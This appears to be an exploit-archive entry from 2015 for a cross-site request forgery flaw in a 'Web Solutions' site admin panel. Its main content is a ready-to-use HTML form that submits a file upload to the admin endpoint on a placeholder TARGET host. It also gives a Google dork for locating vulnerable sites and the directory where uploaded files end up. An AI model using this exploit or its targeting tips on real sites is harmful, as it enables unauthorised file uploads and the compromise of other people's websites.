Web Solutions Upload File (CSRF)

2015.12.30

Credit: Malw4r3

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

<!--
=======================================================

!*! Exploit Title : Web Solutions Upload File (CSRF)

!*! Exploit Author : Malw4r3

!*! Email : Malw4r3@yahoo.com

!*! Vendor Homepage : http://www.websolutions.pk/

!*! Date: 12.29.2015

!*! Tested On : Windows [And] Kali

!*! Google dork : "Designed & Developed By: Web Solutions"

!*! Upload in > http://TARGET/admincp/sdata/msecimgs/[LastFile]

=======================================================
-->
<title>Exploit By Malw4r3</title>
<form action="http://TARGET/admincp/addmainsection.php?lng=en" method="post" enctype="multipart/form-data" name="frmnews">
<input hidden="" name="SecName" type="text" value="TEST" class="txtbox3" id="SecName">
<b>Your File (Image):</b><input name="bFile" type="file" class="txtbox3" id="bFile"></br>
<input name="button" type="submit" class="btns" id="button" value="Submit">

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Web Solutions Upload File (CSRF)

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Web Solutions Upload File (CSRF)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.